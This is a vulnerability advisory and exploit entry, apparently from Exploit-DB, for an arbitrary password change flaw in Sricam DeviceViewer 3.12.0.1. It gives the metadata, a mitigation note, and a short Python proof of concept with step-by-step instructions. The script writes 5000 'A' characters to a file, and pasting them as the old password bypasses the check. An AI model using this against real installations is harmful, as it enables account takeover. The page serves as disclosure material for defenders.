Vendor: DeviceViewer
By: Alessandro Magnosi
CVSS: 8.8 (HIGH)
Arbitrary Password Change
CWE: 20
Product Name: DeviceViewer
Affected Version From: 3.12.0.1
Affected Version To: 3.12.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:sricam:deviceviewer:3.12.0.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2019

DeviceViewer 3.12.0.1 – Arbitrary Password Change

A vulnerability in Sricam DeviceViewer 3.12.0.1 allows an attacker to change the password of any registered user without supplying the valid current password. The attacker creates a malicious payload file (the PoC below writes a string of 5000 "A" characters) and enters its contents as the old password in the change-password dialog. The new password can be set to whatever the attacker wants. To confirm the password change, restart the application and log in with the new password.

Mitigation:

Users should update to the latest version of Sricam DeviceViewer to ensure that the vulnerability is patched.

Exploit-DB raw data:

# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
# Date: 2019-09-10
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7

#!/usr/bin/python

# Steps to reproduce:
#   1. Generate the payload by executing the PoC
#   2. Log in to the Sricam DeviceViewer application as any registered user
#   3. Go to System Tools -> Change Password
#   4. Set the old password to the malicious payload, and the new password to whatever you want
#   5. The password will be changed to the new one
#   6. To confirm, restart the application and try to log in with the new password

# Overlong string entered as the "old password" (5000 "A" characters)
payload = "A" * 5000

try:
    # The context manager closes the file even if the write fails
    with open("bypass.txt", "w") as bypass:
        print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
        print("### Author: Alessandro Magnosi\n")
        print("[*] Creating old password file")
        bypass.write(payload)
    print("[+] Old password file created\n")
    print("[i] When changing password, set the old password to the file contents")
    print("[i] Close the program and reopen it")
    print("[i] Log in with new password")
except (IOError, OSError):
    # Only file-system errors are expected here; other exceptions should surface
    print("[!] Error creating the file")